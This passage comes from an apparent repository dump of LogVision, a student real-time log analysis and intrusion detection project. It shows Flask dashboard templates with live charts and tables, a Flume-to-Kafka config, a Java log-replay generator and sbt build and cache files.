$(document).ready(function () {\n                                namespace = '/good_count';\n                                var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                                socket.on('good_count', function (res) {\n                                    document.getElementById(\"good_count\").innerText = res.data;\n                                });\n                            });\n                        </script>\n                    </div>\n                </div>\n\n                <div class=\"row\">\n                    <div class=\"col-md-12\">\n                        <div class=\"content-box-header\">\n                            <div class=\"panel-title\">实时入侵分类计数（按时间顺序）</div>\n                        </div>\n                        <div class=\"content-box-large box-with-header\">\n                            <div id=\"url_cate_count_timeline\" style=\"height: 350px;\"></div>\n                        </div>\n                    </div>\n                </div>\n                <script>\n                    var url_cate_count_timeline = echarts.init(document.getElementById('url_cate_count_timeline'));\n                    window.onresize = function () {\n                        url_cate_count_timeline.resize();\n                    };\n                    url_cate_count_timeline.showLoading();\n                    url_cate_count_timeline.setOption({\n                        grid: {\n                            bottom: 80\n                        },\n                        tooltip: {\n                            trigger: 'axis',\n                            axisPointer: {\n                                type: 'cross',\n                                animation: false,\n                                label: {\n                                    backgroundColor: '#505765'\n                                }\n                            }\n                        },\n                        legend: {\n                            data: ['异常请求数', '正常请求数'],\n                            left: 10\n                        },\n                        dataZoom: [\n                            {\n                                show: true,\n                                realtime: true,\n                                start: 65,\n                                end: 85\n                            },\n                            {\n                                type: 'inside',\n                                realtime: true,\n                                start: 65,\n                                end: 85\n                            }\n                        ],\n                        xAxis: [\n                            {\n                                type: 'category',\n                                boundaryGap: false,\n                                axisLine: { onZero: false },\n                                data: []\n                            }\n                        ],\n                        yAxis: [\n                            {\n                                name: '异常请求数',\n                                type: 'value',\n                                max: 10\n                            },\n                            {\n                                name: '正常请求数',\n                                nameLocation: 'start',\n                                max: 800,\n                                type: 'value',\n                                inverse: true\n                            }\n                        ],\n                        series: [\n                            {\n                                name: '异常请求数',\n                                type: 'line',\n                                animation: true,\n                                areaStyle: {},\n                                lineStyle: {\n                                    width: 1\n                                },\n                                data: []\n                            },\n                            {\n                                name: '正常请求数',\n                                type: 'line',\n                                yAxisIndex: 1,\n                                animation: true,\n                                areaStyle: {},\n                                lineStyle: {\n                                    width: 1\n                                },\n                                data: []\n                            }\n                        ]\n                    });\n\n                    $(document).ready(function () {\n                        namespace = '/url_cate_count_timeline';\n                        var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                        socket.on('url_cate_count_timeline', function (res) {\n                            url_cate_count_timeline.hideLoading();\n                            url_cate_count_timeline.setOption({\n                                xAxis: {\n                                    data: res.date\n                                },\n                                series: [\n                                    {\n                                        data: res.bad_data\n                                    },\n                                    {\n                                        data: res.good_data\n                                    }\n                                ]\n                            });\n                        });\n                    });\n                </script>\n\n\n                <div class=\"row\">\n                    <div class=\"col-md-6\">\n                        <div class=\"content-box-header\">\n                            <div class=\"panel-title\">实时正常请求地理标记</div>\n                        </div>\n                        <div class=\"content-box-large box-with-header\">\n                            <div id=\"good_geo\" style=\"height:400px;\"></div>\n                        </div>\n                    </div>\n                    <script>\n                        var good_geo = echarts.init(document.getElementById('good_geo'));\n                        window.onresize = function () {\n                            good_geo.resize();\n                        };\n                        good_geo.showLoading();\n                        good_geo.setOption({\n                            tooltip: {\n                                trigger: 'item',\n                                formatter: '{a}<br/>IP地址: {b}<br/>数据: {c}'\n                            },\n                            bmap: {\n                                center: [118, 32],\n                                zoom: 5,\n                                roam: true,\n                                mapStyle: {\n                                    styleJson: [{\n                                        'featureType': 'water',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#d1d1d1'\n                                        }\n                                    }, {\n                                        'featureType': 'land',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#f3f3f3'\n                                        }\n                                    }, {\n                                        'featureType': 'railway',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'highway',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#fdfdfd'\n                                        }\n                                    }, {\n                                        'featureType': 'highway',\n                                        'elementType': 'labels',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'arterial',\n                                        'elementType': 'geometry',\n                                        'stylers': {\n                                            'color': '#fefefe'\n                                        }\n                                    }, {\n                                        'featureType': 'arterial',\n                                        'elementType': 'geometry.fill',\n                                        'stylers': {\n                                            'color': '#fefefe'\n                                        }\n                                    }, {\n                                        'featureType': 'poi',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'green',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'subway',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'manmade',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#d1d1d1'\n                                        }\n                                    }, {\n                                        'featureType': 'local',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#d1d1d1'\n                                        }\n                                    }, {\n                                        'featureType': 'arterial',\n                                        'elementType': 'labels',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'boundary',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#fefefe'\n                                        }\n                                    }, {\n                                        'featureType': 'building',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#d1d1d1'\n                                        }\n                                    }, {\n                                        'featureType': 'label',\n                                        'elementType': 'labels.text.fill',\n                                        'stylers': {\n                                            'color': '#999999'\n                                        }\n                                    }]\n                                }\n                            },\n                            series: [\n                                {\n                                    name: '正常请求定位',\n                                    type: 'effectScatter',\n                                    coordinateSystem: 'bmap',\n                                    showEffectOn: 'render',\n                                    rippleEffect: {\n                                        brushType: 'stroke'\n                                    },\n                                    hoverAnimation: true,\n                                    label: {\n                                        formatter: '{b}',\n                                        position: 'right',\n                                        show: true\n                                    },\n                                    itemStyle: {\n                                        color: 'purple',\n                                        shadowBlur: 10,\n                                        shadowColor: '#333'\n                                    },\n                                    zlevel: 1\n                                }\n                            ]\n                        });\n\n                        $(document).ready(function () {\n                            namespace = '/good_geo';\n                            var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                            socket.on('good_geo', function (res) {\n                                good_geo.hideLoading();\n                                good_geo.setOption({\n                                    series: [{\n                                        data: res.data,\n                                        symbolSize: 10,\n                                    }]\n                                })\n                            });\n                        });\n                    </script>\n\n                    <div class=\"col-md-6\">\n                        <div class=\"content-box-header\">\n                            <div class=\"panel-title\">实时异常请求地理标记</div>\n                        </div>\n                        <div class=\"content-box-large box-with-header\">\n                            <div id=\"bad_geo\" style=\"height:400px;\"></div>\n                        </div>\n                    </div>\n                    <script>\n                        var bad_geo = echarts.init(document.getElementById('bad_geo'));\n                        window.onresize = function () {\n                            bad_geo.resize();\n                        };\n                        bad_geo.showLoading();\n                        bad_geo.setOption({\n                            tooltip: {\n                                trigger: 'item',\n                                formatter: '{a}<br/>IP地址: {b}<br/>数据: {c}'\n                            },\n                            bmap: {\n                                center: [118, 32],\n                                zoom: 5,\n                                roam: true,\n                                mapStyle: {\n                                    styleJson: [{\n                                        'featureType': 'water',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#d1d1d1'\n                                        }\n                                    }, {\n                                        'featureType': 'land',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#f3f3f3'\n                                        }\n                                    }, {\n                                        'featureType': 'railway',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'highway',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#fdfdfd'\n                                        }\n                                    }, {\n                                        'featureType': 'highway',\n                                        'elementType': 'labels',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'arterial',\n                                        'elementType': 'geometry',\n                                        'stylers': {\n                                            'color': '#fefefe'\n                                        }\n                                    }, {\n                                        'featureType': 'arterial',\n                                        'elementType': 'geometry.fill',\n                                        'stylers': {\n                                            'color': '#fefefe'\n                                        }\n                                    }, {\n                                        'featureType': 'poi',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'green',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'subway',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'manmade',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#d1d1d1'\n                                        }\n                                    }, {\n                                        'featureType': 'local',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#d1d1d1'\n                                        }\n                                    }, {\n                                        'featureType': 'arterial',\n                                        'elementType': 'labels',\n                                        'stylers': {\n                                            'visibility': 'off'\n                                        }\n                                    }, {\n                                        'featureType': 'boundary',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#fefefe'\n                                        }\n                                    }, {\n                                        'featureType': 'building',\n                                        'elementType': 'all',\n                                        'stylers': {\n                                            'color': '#d1d1d1'\n                                        }\n                                    }, {\n                                        'featureType': 'label',\n                                        'elementType': 'labels.text.fill',\n                                        'stylers': {\n                                            'color': '#999999'\n                                        }\n                                    }]\n                                }\n                            },\n                            series: [\n                                {\n                                    name: '异常请求定位',\n                                    type: 'effectScatter',\n                                    coordinateSystem: 'bmap',\n                                    showEffectOn: 'render',\n                                    rippleEffect: {\n                                        brushType: 'stroke'\n                                    },\n                                    hoverAnimation: true,\n                                    label: {\n                                        formatter: '{b}',\n                                        position: 'right',\n                                        show: true\n                                    },\n                                    itemStyle: {\n                                        color: 'red',\n                                        shadowBlur: 10,\n                                        shadowColor: '#333'\n                                    },\n                                    zlevel: 1\n                                }\n                            ]\n                        });\n\n                        $(document).ready(function () {\n                            namespace = '/bad_geo';\n                            var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                            socket.on('bad_geo', function (res) {\n                                bad_geo.hideLoading();\n                                bad_geo.setOption({\n                                    series: [{\n                                        data: res.data,\n                                        symbolSize: 10,\n                                    }]\n                                })\n                            });\n                        });\n                    </script>\n                </div>\n\n                <div class=\"row\">\n                    <div class=\"col-md-12\">\n                        <div class=\"content-box-header\">\n                            <div class=\"panel-title\">实时异常请求概览</div>\n                        </div>\n                        <div class=\"content-box-large box-with-header\">\n                            <table id=\"bad_detail\" class=\"table table-sm table-striped\">\n                                <thead>\n                                    <tr>\n                                        <th scope=\"col\">IP</th>\n                                        <th scope=\"col\">来源</th>\n                                        <th scope=\"col\">资源</th>\n                                        <th scope=\"col\">时间</th>\n                                        <th scope=\"col\">方式</th>\n                                        <th scope=\"col\">协议</th>\n                                        <th scope=\"col\">状态码</th>\n                                        <th scope=\"col\">入侵判断</th>\n                                        <th scope=\"col\">参考概率</th>\n                                    </tr>\n                                </thead>\n                                <tbody>\n\n                                </tbody>\n                            </table>\n                        </div>\n                    </div>\n                    <script>\n                        $(document).ready(function () {\n                            namespace = '/bad_detail';\n                            var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                            var items = \"\"\n                            socket.on('bad_detail', function (res) {\n                                $.each(res.data, function (i, item) {\n                                    items += \"<tr>\";\n                                    items += \"<td>\" + item.host + \"</td>\";\n                                    items += \"<td>\" + item.address + \"</td>\";\n                                    items += \"<td>\" + item.url + \"</td>\";\n                                    items += \"<td>\" + item.datetime + \"</td>\";\n                                    items += \"<td>\" + item.req_method + \"</td>\";\n                                    items += \"<td>\" + item.protocol + \"</td>\";\n                                    items += \"<td>\" + item.status_code + \"</td>\";\n                                    items += \"<td>\" + item.pred + \"</td>\";\n                                    items += \"<td>\" + item.prob + \"</td>\";\n                                    items += \"</tr>\";\n                                });\n                                $('#bad_detail tbody').append(items);\n                            });\n                        });\n                    </script>\n\n\n                    <div class=\"col-md-12\">\n                        <div class=\"content-box-header\">\n                            <div class=\"panel-title\">实时正常请求概览</div>\n                        </div>\n                        <div class=\"content-box-large box-with-header\">\n                            <table id=\"good_detail\" class=\"table table-sm table-striped\">\n                                <thead>\n                                    <tr>\n                                        <th scope=\"col\">IP</th>\n                                        <th scope=\"col\">来源</th>\n                                        <th scope=\"col\">资源</th>\n                                        <th scope=\"col\">时间</th>\n                                        <th scope=\"col\">方式</th>\n                                        <th scope=\"col\">协议</th>\n                                        <th scope=\"col\">状态码</th>\n                                        <th scope=\"col\">入侵判断</th>\n                                        <th scope=\"col\">参考概率</th>\n                                    </tr>\n                                </thead>\n                                <tbody>\n\n                                </tbody>\n                            </table>\n                        </div>\n                    </div>\n                    <script>\n                        $(document).ready(function () {\n                            namespace = '/good_detail';\n                            var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n                            var items = \"\"\n                            socket.on('good_detail', function (res) {\n                                items = \"\"\n                                $('#good_detail tbody').html(\"\");\n\n                                $.each(res.data, function (i, item) {\n                                    items += \"<tr>\";\n                                    items += \"<td>\" + item.host + \"</td>\";\n                                    items += \"<td>\" + item.address + \"</td>\";\n                                    items += \"<td>\" + item.url + \"</td>\";\n                                    items += \"<td>\" + item.datetime + \"</td>\";\n                                    items += \"<td>\" + item.req_method + \"</td>\";\n                                    items += \"<td>\" + item.protocol + \"</td>\";\n                                    items += \"<td>\" + item.status_code + \"</td>\";\n                                    items += \"<td>\" + item.pred + \"</td>\";\n                                    items += \"<td>\" + item.prob + \"</td>\";\n                                    items += \"</tr>\";\n                                });\n                                $('#good_detail tbody').append(items);\n                            });\n                        });\n                    </script>\n                </div>\n\n\n            </div>\n        </div>\n\n        <footer>\n            <div class=\"container\">\n\n                <div class=\"copy text-center\">\n                    实时日志分析与入侵检测系统 仅供个人毕业设计演示用途<br> <a\n                        href='https://www.github.com/xander-wang/logvision'>xander-wang/logvision</a>\n                </div>\n\n            </div>\n        </footer>\n\n        <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->\n        <script src=\"https://code.jquery.com/jquery.js\"></script>\n        <!-- Include all compiled plugins (below), or include individual files as needed -->\n        <script src=\"../static/bootstrap/js/bootstrap.min.js\"></script>\n        <script src=\"../static/js/custom.js\"></script>\n</body>\n\n</html>"
  },
  {
    "path": "flask/templates/index.html",
    "content": "<!DOCTYPE html>\n<html lang=\"en\">\n\n<head>\n    <title>LogVision-欢迎</title>\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" charset=\"utf-8\">\n    <link href=\"https://cdn.bootcdn.net/ajax/libs/twitter-bootstrap/3.0.3/css/bootstrap.min.css\" rel=\"stylesheet\">\n    <script type=\"text/javascript\" src=\"https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js\"></script>\n    <link href=\"../static/css/styles.css\" rel=\"stylesheet\">\n    <script type=\"text/javascript\" src=\"https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.3.0/socket.io.js\"></script>\n</head>\n\n<body>\n    <div class=\"header\">\n        <div class=\"container\">\n            <div class=\"row\">\n                <div class=\"col-md-12\">\n                    <!-- Logo -->\n                    <div class=\"logo\">\n                        <h1><a href=\"index.html\">实时日志分析与入侵检测系统</a></h1>\n                    </div>\n                </div>\n            </div>\n        </div>\n    </div>\n\n    <div class=\"page-content\">\n        <div class=\"row\">\n            <div class=\"col-md-2\">\n                <div class=\"sidebar content-box\" style=\"display: block;\">\n                    <ul class=\"nav\">\n                        <!-- Main menu -->\n                        <li class=\"current\"><a href=\"welcome\"><i class=\"glyphicon glyphicon-asterisk\"></i> 欢迎</a>\n                        </li>\n\n                        <li><a href=\"analysis\"><i class=\"glyphicon glyphicon-stats\"></i> 实时日志分析</a>\n                        </li>\n\n                        <li><a href=\"id\"><i class=\"glyphicon glyphicon-adjust\"></i> 实时入侵检测</a>\n                        </li>\n\n                        <li><a href=\"about\"><i class=\"glyphicon glyphicon-info-sign\"></i> 关于系统</a></li>\n\n                    </ul>\n                </div>\n            </div>\n            <div class=\"col-md-10\">\n                <div class=\"row\">\n                    <div class=\"col-md-6\">\n                        <div class=\"alert alert-success\" role=\"alert\">\n                            <h4 class=\"alert-heading\">欢迎使用</h4>\n                            <p>实时日志分析与入侵检测系统可提供面向网络安全的实时日志分析解决方案。</p>\n                        </div>\n                    </div>\n                    <div class=\"col-md-6\">\n                        <div class=\"row\">\n                            <div class=\"col-md-12\">\n                                <div class=\"alert alert-info\" role=\"alert\">\n                                    <h4 id=\"sys_time\" class=\"alert-heading\">Loading...</h4>\n                                    <p>系统时间</p>\n                                </div>\n                            </div>\n                        </div>\n                    </div>\n                </div>\n\n                <div class=\"row\">\n                    <div class=\"col-md-12\">\n                        <div class=\"content-box-header\">\n                            <div class=\"panel-title\">实时日志流</div>\n                        </div>\n                        <div class=\"content-box-large box-with-header\">\n                            <h5 id=\"log_stream\">\n                                Loading...\n                                <br><br>\n                            </h5>\n                        </div>\n                    </div>\n                </div>\n            </div>\n\n\n        </div>\n    </div>\n\n    <footer>\n        <div class=\"container\">\n\n            <div class=\"copy text-center\">\n                实时日志分析与入侵检测系统 仅供个人毕业设计演示用途<br> <a\n                    href='https://www.github.com/xander-wang/logvision'>xander-wang/logvision</a>\n            </div>\n\n        </div>\n    </footer>\n    \n    <script type=\"text/javascript\">\n\n    $(document).ready(function() {\n        namespace = '/sys_time';\n        var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n        socket.on('sys_time', function(res) {\n            document.getElementById(\"sys_time\").innerText = res.data;\n        });\n    });\n\n    $(document).ready(function() {\n        namespace = '/log_stream';\n        var socket = io.connect(location.protocol + '//' + document.domain + ':' + location.port + namespace);\n        socket.on('log_stream', function(res) {\n            document.getElementById(\"log_stream\").innerText = res.data;\n        });\n    });\n\n    </script>\n</body>\n\n</html>"
  },
  {
    "path": "flume/standalone.conf",
    "content": "# LogVision Flume Configuration:\r\n\r\nlogv-source.sources = src\r\nlogv-source.sinks = sink\r\nlogv-source.channels = channel\r\n\r\nlogv-source.sources.src.type = TAILDIR\r\nlogv-source.sources.src.filegroups = f1\r\nlogv-source.sources.src.filegroups.f1 = /home/logSrc\r\n\r\nlogv-source.channels.channel.type = memory\r\nlogv-source.channels.channel.capacity = 1000000\r\nlogv-source.channels.channel.trasactionCapacity = 10000000\r\n\r\nlogv-source.sinks.sink.type = org.apache.flume.sink.kafka.KafkaSink\r\nlogv-source.sinks.sink.kafka.bootstrap.servers = 10.0.0.222:9092\r\nlogv-source.sinks.sink.kafka.topic = raw_log\r\n\r\nlogv-source.sources.src.channels = channel\r\nlogv-source.sinks.sink.channel = channel"
  },
  {
    "path": "log_gen/log_gen.java",
    "content": "/*\n    log_gen｜\b模拟日志生成器 v2.0 by Xander on 2020.2.24\n    \n    这一简单的Java实现可根据传入参数（每次写入行数、写入间隔时间）将样本日志中的特定\n    行块追加至目标日志中，以模拟日志生成，供后续实时处理。\n\n    仅供测试，用了BufferedWriter但实际并未缓存，立即写入。\n\n    #############################################################\n\n    log_gen v2.0 by Xander on June 24th, 2020\n\n    This simple Java implementation is capable of appending specific block\n    of lines into target log file based on given number of lines and time \n    interval to better simulate log appending process, which provides a \n    streaming file source for real-time log processing.\n\n    For Testing only, BufferedWriter is used but no buffer is actually\n    exist, the data's written to the file immediately.\n*/\n\nimport java.io.BufferedReader;\nimport java.io.BufferedWriter;\nimport java.io.IOException;\nimport java.io.LineNumberReader;\nimport java.nio.charset.Charset;\nimport java.nio.file.FileSystems;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\n\nclass LogAppender {\n    public static void main(String[] args) {\n        Charset charset = Charset.forName(\"UTF-8\");\n\n        int linesEachTime = Integer.parseInt(args[2]);\n        int interval = Integer.parseInt(args[3]);\n\n        Path srcLog = FileSystems.getDefault().getPath(args[0]);\n        Path tarLog = FileSystems.getDefault().getPath(args[1]);\n\n        if(args.length < 4) {\n            System.out.println(\"Usage: [LOG_SRC_PATH] [LOG_TARGET_PATH] [NUMBER_OF_LINES_EACH_CYCLE] [TIME_INTERVAL]\");\n        }\n        \n        try {\n            BufferedReader readerForLineCount = Files.newBufferedReader(srcLog, charset);\n            BufferedReader reader = Files.newBufferedReader(srcLog, charset);\n            BufferedWriter writer = Files.newBufferedWriter(tarLog, charset);\n\n            LineNumberReader lineNumberReader = new LineNumberReader(readerForLineCount);\n            lineNumberReader.skip(Long.MAX_VALUE);\n            int totalLine = lineNumberReader.getLineNumber();\n\n            // load and append\n            int i = 0;\n            int current = 0;\n            StringBuilder buffer = new StringBuilder();     // better performance using StringBuilder? \n            String line = null;\n\n            while(current < totalLine) {\n                // load to buffer\n                for (i = 0; i < linesEachTime; i++){\n                    line = reader.readLine();\n                    buffer.append(line + \"\\n\");\n                }\n                current += linesEachTime;\n                System.out.printf(\"\\n------------------------\\n[LogVision] %d lines buffered, ready to append;\\n########################\\n\", linesEachTime);\n                System.out.print(buffer.toString());\n\n                // append as a whole\n                writer.write(buffer.toString(), 0, buffer.toString().length());\n                writer.flush();\n                System.out.printf(\"########################\\n[LogVision] %d lines appended, going to sleep for %d seconds;\\n------------------------\\n\", linesEachTime, interval);\n                \n                buffer.delete(0, buffer.length());\n                Thread.sleep(interval * 1000);\n            }\n        } catch (IOException | InterruptedException e) {\n            e.printStackTrace();\n        }\n    }\n}"
  },
  {
    "path": "spark/build.sbt",
    "content": "\nname := \"logv_compute\"\n\nversion := \"0.1\"\n\nscalaVersion := \"2.11.12\"\n\nlibraryDependencies ++= Seq(\n  \"org.apache.spark\" % \"spark-core_2.11\" % \"2.4.5\",\n  \"org.apache.spark\" % \"spark-streaming_2.11\" % \"2.4.5\",\n  \"org.apache.spark\" % \"spark-streaming-kafka-0-10_2.11\" % \"2.4.5\",\n  \"org.apache.spark\" % \"spark-mllib_2.11\" % \"2.4.5\",\n  \"net.debasishg\" %% \"redisclient\" % \"3.20\",\n\n)\n\n\nconflictWarning := ConflictWarning.disable\n\nassemblyMergeStrategy in assembly := {\n  case PathList(\"META-INF\", xs @ _*) => MergeStrategy.discard\n  case x => MergeStrategy.first\n}"
  },
  {
    "path": "spark/project/assembly.sbt",
    "content": "addSbtPlugin(\"com.eed3si9n\" % \"sbt-assembly\" % \"0.14.10\")"
  },
  {
    "path": "spark/project/build.properties",
    "content": "sbt.version = 1.3.8"
  },
  {
    "path": "spark/project/project/target/config-classes/$43a0538f7780cac449ae.cache",
    "content": "sbt.internal.DslEntry"
  },
  {
    "path": "spark/project/target/config-classes/$16828faecf688d54d497.cache",
    "content": "sbt.internal.DslEntry"
  },
  {
    "path": "spark/project/target/config-classes/$30003e6e888c6501d0a9.cache",
    "content": "sbt.internal.DslEntry"
  },
  {
    "path": "spark/project/target/config-classes/$3d85af9b26c1a259b49e.cache",
    "content": "sbt.internal.DslEntry"
  },
  {
    "path": "spark/project/target/config-classes/$46bc225346f5c722f39f.cache",
    "content": "sbt.internal.DslEntry"
  },
  {
    "path": "spark/project/target/config-classes/$da50ce791668c9ed0f15.cache",
    "content": "sbt.internal.DslEntry"
  },
  {
    "path": "spark/project/target/config-classes/$f2cabef45cb06cd331f1.cache",
    "content": "sbt.internal.DslEntry"
  },
  {
    "path": "spark/project/target/scala-2.12/sbt-1.0/update/update_cache_2.12/inputs",
    "content": "-164808489"
  },
  {
    "path": "spark/project/target/scala-2.12/sbt-1.0/update/update_cache_2.12/output",
    "content": "{\"cachedDescriptor\":\".\",\"configurations\":[{\"configuration\":{\"name\":\"plugin\"},\"modules\":[],\"details\":[]},{\"configuration\":{\"name\":\"pom\"},\"modules\":[],\"details\":[]},{\"configuration\":{\"name\":\"test\"},\"modules\":[{\"module\":{\"organization\":\"org.apache.commons\",\"name\":\"commons-lang3\",\"revision\":\"3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"org.apache.maven.wagon\",\"name\":\"wagon-provider-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"commons-lang3\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://commons.apache.org/proper/commons-lang/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-plugin-api\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-plugin-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.ant\",\"name\":\"ant\",\"revision\":\"1.9.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ant\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://ant.apache.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-artifact\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"org.apache.maven.wagon\",\"name\":\"wagon-provider-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-artifact\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.inject\",\"name\":\"javax.inject\",\"revision\":\"1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"javax.inject\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://code.google.com/p/atinject/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":